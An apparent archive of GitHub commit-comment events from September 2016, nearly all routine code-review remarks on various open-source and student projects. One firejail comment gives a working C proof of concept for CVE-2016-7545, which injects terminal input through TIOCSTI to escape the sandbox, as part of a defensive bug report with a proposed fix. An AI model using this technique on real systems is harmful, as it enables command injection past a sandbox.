{"id":"4625256522","type":"CommitCommentEvent","actor":{"login":"nirvdrum"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19193249,"position":42,"line":58,"path":"truffle/src/main/java/org/jruby/truffle/interop/JRubyInterop.java","commit_id":"ffa06d3897de0ed2ac5ff4f943bb349ca3e60fb9","created_at":"2016-09-27T16:09:22Z","updated_at":"2016-09-27T16:09:22Z","body":"While we already don't run well on Windows, I'd like to stop propagating the problems. As it stands, our inability to properly boot on Windows is almost entirely related to paths converted to strings with exact character matches. Using `java.nio.file.Path` methods should take the path separator into account."}},"created_at":"2016-09-27T16:09:22Z"}
{"id":"4625257164","type":"CommitCommentEvent","actor":{"login":"openhardwarecoza"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":19193250,"position":null,"line":null,"path":null,"commit_id":"4c7fdef36f85b389dfd296f67f563c568ea9180c","created_at":"2016-09-27T16:09:29Z","updated_at":"2016-09-27T16:09:29Z","body":"Work in progress,  just using standard bootstrap css classes instead of own\ncss button class (: (so far)\n\nOn Sep 27, 2016 4:58 PM, \"Richard Betel\" <notifications@github.com> wrote:\n\n> What do the do, other than add padding? Or are they part of a work in\n> progress?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/openhardwarecoza/LaserWeb4/commit/4c7fdef36f85b389dfd296f67f563c568ea9180c#commitcomment-19191611>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHVr29UFvsOkZft4B7ZpDvD6Qyq51eIoks5quSjxgaJpZM4KHvR7>\n> .\n>\n"}},"created_at":"2016-09-27T16:09:29Z"}
{"id":"4625259129","type":"CommitCommentEvent","actor":{"login":"gibsona451"},"repo":{"name":"Piercek966/Hello-World"},"payload":{"comment":{"id":19193253,"position":6,"line":7,"path":"Hello.java","commit_id":"8afa60897f5b36b4b7754f918d934ab8cd412baa","created_at":"2016-09-27T16:09:49Z","updated_at":"2016-09-27T16:09:49Z","body":"Hello Kate!\r\n"}},"created_at":"2016-09-27T16:09:49Z"}
{"id":"4625259273","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19193254,"position":154,"line":154,"path":"api/labs/easyrtc_recorder.js","commit_id":"45ee1d0f3686184dffd126f599affc1a499d7df9","created_at":"2016-09-27T16:09:49Z","updated_at":"2016-09-27T16:09:49Z","body":"Duplicate fun. @ericdavies"}},"created_at":"2016-09-27T16:09:49Z"}
{"id":"4625267096","type":"CommitCommentEvent","actor":{"login":"frankleonrose"},"repo":{"name":"things-nyc/arduino-lmic"},"payload":{"comment":{"id":19193273,"position":null,"line":null,"path":null,"commit_id":"40e96518686393932ae3ee73aa7c06ee9af993d6","created_at":"2016-09-27T16:11:09Z","updated_at":"2016-09-27T16:11:09Z","body":"Way before transmit or FCC, I'm just talking about the algorithm for picking at random an enabled channel. Neither strategy we have in the code is great, but I haven't come up with anything better."}},"created_at":"2016-09-27T16:11:09Z"}
{"id":"4625269604","type":"CommitCommentEvent","actor":{"login":"olear"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":19193284,"position":53,"line":206,"path":"Gui/GuiApplicationManager10.cpp","commit_id":"ba00595131ed63a4ee925f4cae1c106bf8eb9a1c","created_at":"2016-09-27T16:11:34Z","updated_at":"2016-09-27T16:11:34Z","body":"```\r\ncompiling ../../Gui/GuiApplicationManagerPrivate.cpp\r\n../../Gui/GuiApplicationManager10.cpp: In constructor 'Natron::Application::Application(Natron::GuiApplicationManager*, int&, char**)':\r\n../../Gui/GuiApplicationManager10.cpp:206:50: error: cannot convert 'id {aka objc_object*}' to 'Class {aka objc_class*}' in initialization\r\n         Class cls = objc_getClass(\"NSApplication\");\r\n```\r\nhttps://natron.fr/build-logs/?id=562&os=mac"}},"created_at":"2016-09-27T16:11:34Z"}
{"id":"4625270385","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19193287,"position":null,"line":null,"path":null,"commit_id":"b604cb8dd5d23c804a194de4f1d627750814ca18","created_at":"2016-09-27T16:11:42Z","updated_at":"2016-09-27T16:11:42Z","body":"I will test that.\r\nLgtm so far"}},"created_at":"2016-09-27T16:11:42Z"}
{"id":"4625271021","type":"CommitCommentEvent","actor":{"login":"LebedevRI"},"repo":{"name":"darktable-org/darktable"},"payload":{"comment":{"id":19193292,"position":8,"line":514,"path":"data/kernels/extended.cl","commit_id":"af3dbae72c86279444ef147575c98b4de47eac24","created_at":"2016-09-27T16:11:48Z","updated_at":"2016-09-27T16:11:48Z","body":"@upegelow don't we require only opencl 1.1?\r\n\r\nI'm trying to make clang compile opencl, and i get:\r\n\r\n```\r\nextended.cl:514:1: error: OpenCL version 1.1 does not support the 'static' storage class specifier\r\nstatic void\r\n^\r\n1 error generated.\r\n```"}},"created_at":"2016-09-27T16:11:48Z"}
{"id":"4625271762","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-iowait"},"payload":{"comment":{"id":19193295,"position":19,"line":19,"path":"README.md","commit_id":"f6fbea2bbfbb81b8ed0789dc9dd1952424fc5a25","created_at":"2016-09-27T16:11:56Z","updated_at":"2016-09-27T16:11:56Z","body":"imag**e**"}},"created_at":"2016-09-27T16:11:56Z"}
{"id":"4625274297","type":"CommitCommentEvent","actor":{"login":"Nsovo"},"repo":{"name":"Nsovo/backend-developer-assessment"},"payload":{"comment":{"id":19193301,"position":null,"line":null,"path":null,"commit_id":"f15414fcb035b589b506998832eb7851c8cb5b8e","created_at":"2016-09-27T16:12:19Z","updated_at":"2016-09-27T16:12:19Z","body":"read me"}},"created_at":"2016-09-27T16:12:19Z"}
{"id":"4625274745","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/Exception"},"payload":{"comment":{"id":19193302,"position":8,"line":9,"path":"src/exception/TerminalServerImpl.java","commit_id":"c7aa98f17d4831d7c98331a5021d762f31e5d77a","created_at":"2016-09-27T16:12:23Z","updated_at":"2016-09-27T16:12:23Z","body":"pin и баланс не могут быть атрибутами терминального сервера"}},"created_at":"2016-09-27T16:12:23Z"}
{"id":"4625276469","type":"CommitCommentEvent","actor":{"login":"jnioche"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19193309,"position":72,"line":72,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-27T16:12:41Z","updated_at":"2016-09-27T16:12:41Z","body":"I'd remove maximumSize. Things will get removed with the maxDuration anyway"}},"created_at":"2016-09-27T16:12:41Z"}
{"id":"4625277188","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19193310,"position":null,"line":null,"path":null,"commit_id":"702b005ee86d4111a63ad32e568abc281af18fe5","created_at":"2016-09-27T16:12:48Z","updated_at":"2016-09-27T16:12:48Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.267.702b005ee86d4111a63ad32e568abc281af18fe5](http://build.palaso.org/viewLog.html?buildId=77152&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1289, ignored: 17 Build time: 00:04:09"}},"created_at":"2016-09-27T16:12:48Z"}
{"id":"4625277410","type":"CommitCommentEvent","actor":{"login":"luixxiul"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19193311,"position":null,"line":null,"path":null,"commit_id":"53fd847d2f8f16f5922f2539be30ead3c5f2a56f","created_at":"2016-09-27T16:12:50Z","updated_at":"2016-09-27T16:12:50Z","body":"thanks!"}},"created_at":"2016-09-27T16:12:50Z"}
{"id":"4625278151","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19193312,"position":104,"line":3584,"path":"api/easyrtc_int.js","commit_id":"b604cb8dd5d23c804a194de4f1d627750814ca18","created_at":"2016-09-27T16:12:57Z","updated_at":"2016-09-27T16:12:57Z","body":"stream may be instead of \"theStream\" or callStream may be"}},"created_at":"2016-09-27T16:12:57Z"}
{"id":"4625279298","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19193315,"position":48,"line":735,"path":"api/easyrtc_int.js","commit_id":"b604cb8dd5d23c804a194de4f1d627750814ca18","created_at":"2016-09-27T16:13:09Z","updated_at":"2016-09-27T16:13:09Z","body":"Lgtm"}},"created_at":"2016-09-27T16:13:09Z"}
{"id":"4625279813","type":"CommitCommentEvent","actor":{"login":"jnioche"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19193318,"position":68,"line":68,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-27T16:13:14Z","updated_at":"2016-09-27T16:13:14Z","body":"I'd remove the empty constructor"}},"created_at":"2016-09-27T16:13:14Z"}
{"id":"4625281625","type":"CommitCommentEvent","actor":{"login":"necto"},"repo":{"name":"Bromind/Semester-project"},"payload":{"comment":{"id":19193325,"position":27,"line":27,"path":"main.c","commit_id":"0b6323ef1ee3d9f765d9201046ca900cb0663661","created_at":"2016-09-27T16:13:33Z","updated_at":"2016-09-27T16:13:33Z","body":"The name of the variable `resPut` does not correspond to it's value: it actually contains negations of the results of the put operation."}},"created_at":"2016-09-27T16:13:33Z"}
{"id":"4625282706","type":"CommitCommentEvent","actor":{"login":"joerg-krause"},"repo":{"name":"mikebrady/shairport-sync"},"payload":{"comment":{"id":19193327,"position":null,"line":null,"path":null,"commit_id":"d9b28443fc0e465f41dbe54371a1c8ca62c2be6e","created_at":"2016-09-27T16:13:44Z","updated_at":"2016-09-27T16:13:44Z","body":"Awesome! Many thanks for the exciting news!"}},"created_at":"2016-09-27T16:13:44Z"}
{"id":"4625287249","type":"CommitCommentEvent","actor":{"login":"slackpad"},"repo":{"name":"hashicorp/consul"},"payload":{"comment":{"id":19193338,"position":null,"line":null,"path":null,"commit_id":"49a410a2daf7ef12af130189c98f976599ab868a","created_at":"2016-09-27T16:14:29Z","updated_at":"2016-09-27T16:14:29Z","body":"I think we need to clarify that bind defaults to 0.0.0.0 as you've done here, and with that, the advertise address defaults to the first available private IPv4 address or public IPv6 address. Here's the logic that's doing all this:\r\n\r\nhttps://github.com/hashicorp/consul/blob/master/command/agent/agent.go#L145-L164"}},"created_at":"2016-09-27T16:14:29Z"}
{"id":"4625287730","type":"CommitCommentEvent","actor":{"login":"markhamstra"},"repo":{"name":"markhamstra/spark"},"payload":{"comment":{"id":19193339,"position":54,"line":1279,"path":"core/src/main/scala/org/apache/spark/scheduler/DAGScheduler.scala","commit_id":"368f82d9789ec04565af835e7cb80d1cdb0ccf0c","created_at":"2016-09-27T16:14:35Z","updated_at":"2016-09-27T16:14:35Z","body":"@squito Another thing that I was wondering is if we should be logging the addition of `failedStage` and `mapStage` to `failedStages`.  As it has been and is now, we only log when posting `ResubmitFailedStages`, so stages that are about to be re-run but for which a new `ResubmitFailedStages` isn't necessary go without any mention in the logs."}},"created_at":"2016-09-27T16:14:35Z"}
{"id":"4625289148","type":"CommitCommentEvent","actor":{"login":"jnioche"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19193343,"position":103,"line":103,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-27T16:14:49Z","updated_at":"2016-09-27T16:14:49Z","body":"what about getting the time out value from the conf with an arbitrary key e.g. elasticsearch.completioncache.timeout and use the remaining non-empty constructor?\r\n"}},"created_at":"2016-09-27T16:14:49Z"}
{"id":"4625289293","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-iowait"},"payload":{"comment":{"id":19193344,"position":14,"line":14,"path":"README.md","commit_id":"f6fbea2bbfbb81b8ed0789dc9dd1952424fc5a25","created_at":"2016-09-27T16:14:50Z","updated_at":"2016-09-27T16:14:50Z","body":"Indentation looks wrong. I suggest just 4 spaces."}},"created_at":"2016-09-27T16:14:50Z"}
{"id":"4625293409","type":"CommitCommentEvent","actor":{"login":"aphisitworachorch"},"repo":{"name":"aphisitworachorch/android_device_huawei_kiwi"},"payload":{"comment":{"id":19193351,"position":null,"line":null,"path":null,"commit_id":"c08bba1060d419783a44f4558beaf5efb0f4f75c","created_at":"2016-09-27T16:15:31Z","updated_at":"2016-09-27T16:15:31Z","body":"@BadDaemon sorry .... i changed with upstream .... T_T not appear commit "}},"created_at":"2016-09-27T16:15:31Z"}
{"id":"4625294098","type":"CommitCommentEvent","actor":{"login":"marcelolebre"},"repo":{"name":"Unbabel/devops-coding-challenge"},"payload":{"comment":{"id":19193354,"position":null,"line":null,"path":null,"commit_id":"025ed5f28b2ecdff15559923a0b3eba975bff7a0","created_at":"2016-09-27T16:15:38Z","updated_at":"2016-09-27T16:15:38Z","body":"👍 "}},"created_at":"2016-09-27T16:15:38Z"}
{"id":"4625296189","type":"CommitCommentEvent","actor":{"login":"jnioche"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19193358,"position":39,"line":39,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-27T16:15:59Z","updated_at":"2016-09-27T16:15:59Z","body":"I like the clarity that this abstract class brings"}},"created_at":"2016-09-27T16:15:59Z"}
{"id":"4625297090","type":"CommitCommentEvent","actor":{"login":"VasilevsVV"},"repo":{"name":"VasilevsVV/PythonTest"},"payload":{"comment":{"id":19193361,"position":null,"line":null,"path":null,"commit_id":"424bff173a265f99efeea705089c67541a30de2a","created_at":"2016-09-27T16:16:08Z","updated_at":"2016-09-27T16:16:08Z","body":"initial"}},"created_at":"2016-09-27T16:16:08Z"}
{"id":"4625300766","type":"CommitCommentEvent","actor":{"login":"ajcvickers"},"repo":{"name":"aspnet/EntityFramework"},"payload":{"comment":{"id":19193370,"position":71,"line":74,"path":"src/EntityFramework.Core/Metadata/Internal/ClrCollectionAccessorFactory.cs","commit_id":"b786b4614789e35986e7811fccc848ec543e428d","created_at":"2016-09-27T16:16:45Z","updated_at":"2016-09-27T16:16:45Z","body":"@azabluda Filed #6616"}},"created_at":"2016-09-27T16:16:45Z"}
{"id":"4625302672","type":"CommitCommentEvent","actor":{"login":"jtulach"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19193380,"position":42,"line":58,"path":"truffle/src/main/java/org/jruby/truffle/interop/JRubyInterop.java","commit_id":"ffa06d3897de0ed2ac5ff4f943bb349ca3e60fb9","created_at":"2016-09-27T16:17:05Z","updated_at":"2016-09-27T16:17:05Z","body":"`currentJarFile.getName().equals(\"ruby.jar\")` is also an option."}},"created_at":"2016-09-27T16:17:05Z"}
{"id":"4625304857","type":"CommitCommentEvent","actor":{"login":"mbootsector"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":19193389,"position":null,"line":null,"path":null,"commit_id":"eafb1b6348010722bbfcc3a6fd5e7949dafac296","created_at":"2016-09-27T16:17:26Z","updated_at":"2016-09-27T16:17:26Z","body":"Local test 8+0.08:\r\nScore of dev vs base: 437 - 428 - 1224  [0.502] 2089\r\nLet's see how it goes on fishtest.\r\n"}},"created_at":"2016-09-27T16:17:26Z"}
{"id":"4625304868","type":"CommitCommentEvent","actor":{"login":"ramyogeshwaran"},"repo":{"name":"ramyogeshwaran/wintelteams"},"payload":{"comment":{"id":19193390,"position":null,"line":null,"path":null,"commit_id":"eab417a22fb96a28634137f423b20b61884ca989","created_at":"2016-09-27T16:17:26Z","updated_at":"2016-09-27T16:17:26Z","body":"Set wshShell = WScript.CreateObject( \"WScript.Shell\" )\r\nstrComputerName = wshShell.ExpandEnvironmentStrings( \"%COMPUTERNAME%\" )\r\n'strComputerName = wshShell.ExpandEnvironmentStrings( \"%Logonserver%\" )\r\nset objNetwork = CreateObject(\"WScript.Network\")\r\nstrComputerName = objNetwork.Computername\r\nSet wmiobj = GetObject(\"winmgmts://localhost/root/cimv2:Win32_BIOS\")\r\nFor Each ver In wmiobj.Instances_\r\n\r\n\r\nSet IPConfigSet = GetObject(\"winmgmts://.\").ExecQuery(\"select * from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE\")\r\n    for each IPConfig In IPConfigSet\r\n            If Not IsNull(IPConfig.IPAddress) Then\r\n                   'For i=LBound(IPConfig.IPAddress) To UBound(IPConfig.IPAddress)\r\ninfo = (\"IPAddress: \" & IPConfig.IPAddress(i) & vbCrLf & \"Computer Name: \" & strComputerName & vbCrLf & \"DELL Service Tag: \" & ver.SerialNumber)\r\n\tmsgbox info ,vbInformation,\"Blue-Net\"\r\n                    'WScript.Echo (\"IPAddress: \" & IPConfig.IPAddress(i) & vbCrLf & \"Computer Name: \" & strComputerName), \"Title\"\r\n                   'Next\r\n            End If\r\n    Next\r\n\tnext"}},"created_at":"2016-09-27T16:17:26Z"}
{"id":"4625305509","type":"CommitCommentEvent","actor":{"login":"mikebrady"},"repo":{"name":"mikebrady/shairport-sync"},"payload":{"comment":{"id":19193391,"position":null,"line":null,"path":null,"commit_id":"d9b28443fc0e465f41dbe54371a1c8ca62c2be6e","created_at":"2016-09-27T16:17:33Z","updated_at":"2016-09-27T16:17:33Z","body":"Thanks. Actually, it works well on an RPi with a Pimoroni PHAT DAC and it works on OpenWrt, as does `libalac`. It'll take a while to propagate `libalac` into the various distributions, I guess..."}},"created_at":"2016-09-27T16:17:33Z"}
{"id":"4625305982","type":"CommitCommentEvent","actor":{"login":"jnioche"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19193393,"position":65,"line":209,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AggregationSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-27T16:17:37Z","updated_at":"2016-09-27T16:17:37Z","body":"maxURLsPerBucket is not the right value to use. See above my comment about removing the size constraint"}},"created_at":"2016-09-27T16:17:37Z"}
{"id":"4625306666","type":"CommitCommentEvent","actor":{"login":"MikeInnes"},"repo":{"name":"JunoLab/Blink.jl"},"payload":{"comment":{"id":19193395,"position":null,"line":null,"path":null,"commit_id":"c1d9e2562ad1a9e02373cc984feeeb4f5dd0a64f","created_at":"2016-09-27T16:17:44Z","updated_at":"2016-09-27T16:17:44Z","body":"I added this to lazy.jl for now (but may not have pushed yet)"}},"created_at":"2016-09-27T16:17:44Z"}
{"id":"4625308239","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193398,"position":83,"line":83,"path":"src/FinanceSystem.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:18:01Z","updated_at":"2016-09-27T16:18:01Z","body":"Каждому case'у свой метод."}},"created_at":"2016-09-27T16:18:01Z"}
{"id":"4625311072","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193405,"position":79,"line":79,"path":"src/FinanceSystem.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:18:30Z","updated_at":"2016-09-27T16:18:30Z","body":"Длинные цепочки вызовов - зло."}},"created_at":"2016-09-27T16:18:30Z"}
{"id":"4625312789","type":"CommitCommentEvent","actor":{"login":"devlysh"},"repo":{"name":"ihororlovskyi/ihororlovskyi.github.io"},"payload":{"comment":{"id":19193412,"position":3,"line":3,"path":"README.md","commit_id":"3f94dfcfa71f001c5195eda7396903a27426e0ec","created_at":"2016-09-27T16:18:44Z","updated_at":"2016-09-27T16:18:44Z","body":"ты джаваскриптЫ выучил? 😄"}},"created_at":"2016-09-27T16:18:44Z"}
{"id":"4625316123","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193418,"position":17,"line":17,"path":"src/FinanceSystem.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:19:14Z","updated_at":"2016-09-27T16:19:14Z","body":"Не приватный + List<TerminalImpl> нужно заменить на List<Terminal>"}},"created_at":"2016-09-27T16:19:14Z"}
{"id":"4625320081","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19193427,"position":null,"line":null,"path":null,"commit_id":"c8f45f763cac3c0d0e4ca35ba072d8d321957e85","created_at":"2016-09-27T16:19:53Z","updated_at":"2016-09-27T16:19:53Z","body":"Thanks!"}},"created_at":"2016-09-27T16:19:53Z"}
{"id":"4625322212","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19193432,"position":48,"line":48,"path":"HelloWorld/Miscellaneous/MemoryModel2.cs","commit_id":"c9221fad885ccdde1f4739907b2e898ee87b3ff6","created_at":"2016-09-27T16:20:15Z","updated_at":"2016-09-27T16:20:15Z","body":"Пора взяться и за улучшение этого блока) Так как мы теперь знаем, что любая инструкция у нас занимает 8 байт и содержит три аргумента (даже если они не используются, мы всё равно туда нули записываем).\r\nЗначит мы можем абстрагироваться от деталей вычитывания значений для каждой отдельной инструкции, всегда вычитывать номер инструкции и три её ushort-аргумента, вызываем инструкцию по коду, передаём ей аргументы и всё! Больше ничего нам знать про эти инструкции не надо, про её внутрение детали исполнения. Только то, что ей соответствуюет какой-то номер и что она принимает три аргумента. Вначале можно оставить для этих целей тот же switch() в котором мы по номеру инструкции узнаём какой метод вызвать и просто вызываем его с уже прочитанными для него аргументами. На в качестве второго шага упрощения, мы могли бы воспользоваться массивом методов! Потому что найти что-то по номеру и выполнить с этим одинаковые операции - это больше подходит для работы с массивом, чем со switch. Из первых занятий мы помним, что можно сохранить функцию в переменную с типом Func<>. Раз можно в переменную, значит можно и в массив такого же типа. Причём, не обязательно сохранять туда лямбды, можно вместо лябда-выражения указывать имя метода, главное чтобы у всех методов точно совпадал набор параметров и тип возвращаемого значения. Выглядеть это будет примерно так:\r\nFunc<byte[], ushort, ushort, ushort, ushort> instructions = new Func<byte[], ushort, ushort, ushort, ushort>[8];\r\ninstrucions[InstructionCode.Jump] = Jump;\r\n\r\nА обращение к этому массиву будет выглядеть так:\r\ncurrentInstructionOffset = instructions[currentInstruction](memory, arg1, arg2, arg3);"}},"created_at":"2016-09-27T16:20:15Z"}
{"id":"4625323062","type":"CommitCommentEvent","actor":{"login":"pfitzseb"},"repo":{"name":"JunoLab/Blink.jl"},"payload":{"comment":{"id":19193435,"position":null,"line":null,"path":null,"commit_id":"c1d9e2562ad1a9e02373cc984feeeb4f5dd0a64f","created_at":"2016-09-27T16:20:22Z","updated_at":"2016-09-27T16:20:22Z","body":"No, I just wasn't on latest master, so nevermind."}},"created_at":"2016-09-27T16:20:22Z"}
{"id":"4625323743","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193438,"position":37,"line":37,"path":"src/FinanceSystem.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:20:29Z","updated_at":"2016-09-27T16:20:29Z","body":"А зачем пользователю атрибут Терминал?"}},"created_at":"2016-09-27T16:20:29Z"}
{"id":"4625323804","type":"CommitCommentEvent","actor":{"login":"jnioche"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19193439,"position":58,"line":58,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-27T16:20:29Z","updated_at":"2016-09-27T16:20:29Z","body":"why does it have to be a Map? Can't we just have a Set to keep the URLs?"}},"created_at":"2016-09-27T16:20:29Z"}
{"id":"4625335048","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193463,"position":2,"line":2,"path":"src/Terminal.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:22:15Z","updated_at":"2016-09-27T16:22:15Z","body":"Методы интерфейса по умолчанию публичные => public здесь не нужен"}},"created_at":"2016-09-27T16:22:15Z"}
{"id":"4625335370","type":"CommitCommentEvent","actor":{"login":"CarlosMChica"},"repo":{"name":"codurance/site"},"payload":{"comment":{"id":19193464,"position":null,"line":null,"path":null,"commit_id":"d6ec765663a14cdba5449c2b70ae285d70fb388b","created_at":"2016-09-27T16:22:17Z","updated_at":"2016-09-27T16:22:17Z","body":"@franziskas email is already defined in the translations as office.email -> https://github.com/codurance/site/blob/master/_i18n/en.yml\r\nhttps://github.com/codurance/site/blob/master/_i18n/es.yml\r\n\r\nIn order for the site to translate them we have to reference them as follows. {% t office.email %}"}},"created_at":"2016-09-27T16:22:17Z"}
{"id":"4625336558","type":"CommitCommentEvent","actor":{"login":"CarlosMChica"},"repo":{"name":"codurance/site"},"payload":{"comment":{"id":19193469,"position":null,"line":null,"path":null,"commit_id":"d6ec765663a14cdba5449c2b70ae285d70fb388b","created_at":"2016-09-27T16:22:30Z","updated_at":"2016-09-27T16:22:30Z","body":"I can have a look tomorrow morning if you want"}},"created_at":"2016-09-27T16:22:30Z"}
{"id":"4625338918","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19193471,"position":42,"line":58,"path":"truffle/src/main/java/org/jruby/truffle/interop/JRubyInterop.java","commit_id":"ffa06d3897de0ed2ac5ff4f943bb349ca3e60fb9","created_at":"2016-09-27T16:22:52Z","updated_at":"2016-09-27T16:22:52Z","body":"I wish Java used the same approach as Ruby and converted those `\\` to `/`."}},"created_at":"2016-09-27T16:22:52Z"}
{"id":"4625341996","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson5"},"payload":{"comment":{"id":19193482,"position":7,"line":7,"path":"src/TerminalImpl.java","commit_id":"0316e2b495c16100a8ca251bc17f903ffab6dd86","created_at":"2016-09-27T16:23:22Z","updated_at":"2016-09-27T16:23:22Z","body":"Блокироваться может счёт или учётная запись клиента, терминал не должен блокироваться."}},"created_at":"2016-09-27T16:23:22Z"}
{"id":"4625343802","type":"CommitCommentEvent","actor":{"login":"squito"},"repo":{"name":"markhamstra/spark"},"payload":{"comment":{"id":19193486,"position":54,"line":1279,"path":"core/src/main/scala/org/apache/spark/scheduler/DAGScheduler.scala","commit_id":"368f82d9789ec04565af835e7cb80d1cdb0ccf0c","created_at":"2016-09-27T16:23:39Z","updated_at":"2016-09-27T16:23:39Z","body":"ah good point.  We definitely should be logging that.  It would also get covered by checking `!failedStages.contains(stage)`, right?  so more reason to make that change."}},"created_at":"2016-09-27T16:23:39Z"}
{"id":"4625344144","type":"CommitCommentEvent","actor":{"login":"Bromind"},"repo":{"name":"Bromind/Semester-project"},"payload":{"comment":{"id":19193488,"position":16,"line":16,"path":"main.c","commit_id":"0b6323ef1ee3d9f765d9201046ca900cb0663661","created_at":"2016-09-27T16:23:42Z","updated_at":"2016-09-27T16:23:42Z","body":"Yes, for now it is just a (too) simple test. Only for <int, int> <key, value> tuples."}},"created_at":"2016-09-27T16:23:42Z"}
{"id":"4625345568","type":"CommitCommentEvent","actor":{"login":"manevich"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":19193491,"position":4,"line":389,"path":"src/firejail/join.c","commit_id":"ae0e5b667d7756f5a4e318c37aefb0a827abbf25","created_at":"2016-09-27T16:23:58Z","updated_at":"2016-09-27T16:23:58Z","body":"Consider this program:\r\n```c\r\n#include <unistd.h>\r\n#include <sys/ioctl.h>\r\n#include <termios.h>\r\n#include <fcntl.h>\r\n\r\nint main()\r\n{\r\n    char *cmd = \"ls /proc\\n\";\r\n    while(*cmd)\r\n    \tioctl(0, TIOCSTI, cmd++);\r\n\r\n\tsleep(1000);\r\n    return 0;\r\n}\r\n```\r\nand commands `firejail --name=test`, `firejail --join=test ./CVE-2016-7545` and `kill $(firejail --list | grep CVE-2016-7545 | cut -d: -f1)`\r\n\r\n`ls /proc` injected to terminal after kill.\r\n\r\nI tried to prevent this by adding signal handler, you can see it [here](https://github.com/manevich/firejail/commit/b65b1c8b35e1cf29012c7028da43adad1c1e2b58) (not very tested, just for example)."}},"created_at":"2016-09-27T16:23:58Z"}
{"id":"4625348510","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19193502,"position":42,"line":58,"path":"truffle/src/main/java/org/jruby/truffle/interop/JRubyInterop.java","commit_id":"ffa06d3897de0ed2ac5ff4f943bb349ca3e60fb9","created_at":"2016-09-27T16:24:29Z","updated_at":"2016-09-27T16:24:29Z","body":"Fixed in ddf8eb30b97d65441d09e443f40291af3ae02161"}},"created_at":"2016-09-27T16:24:29Z"}
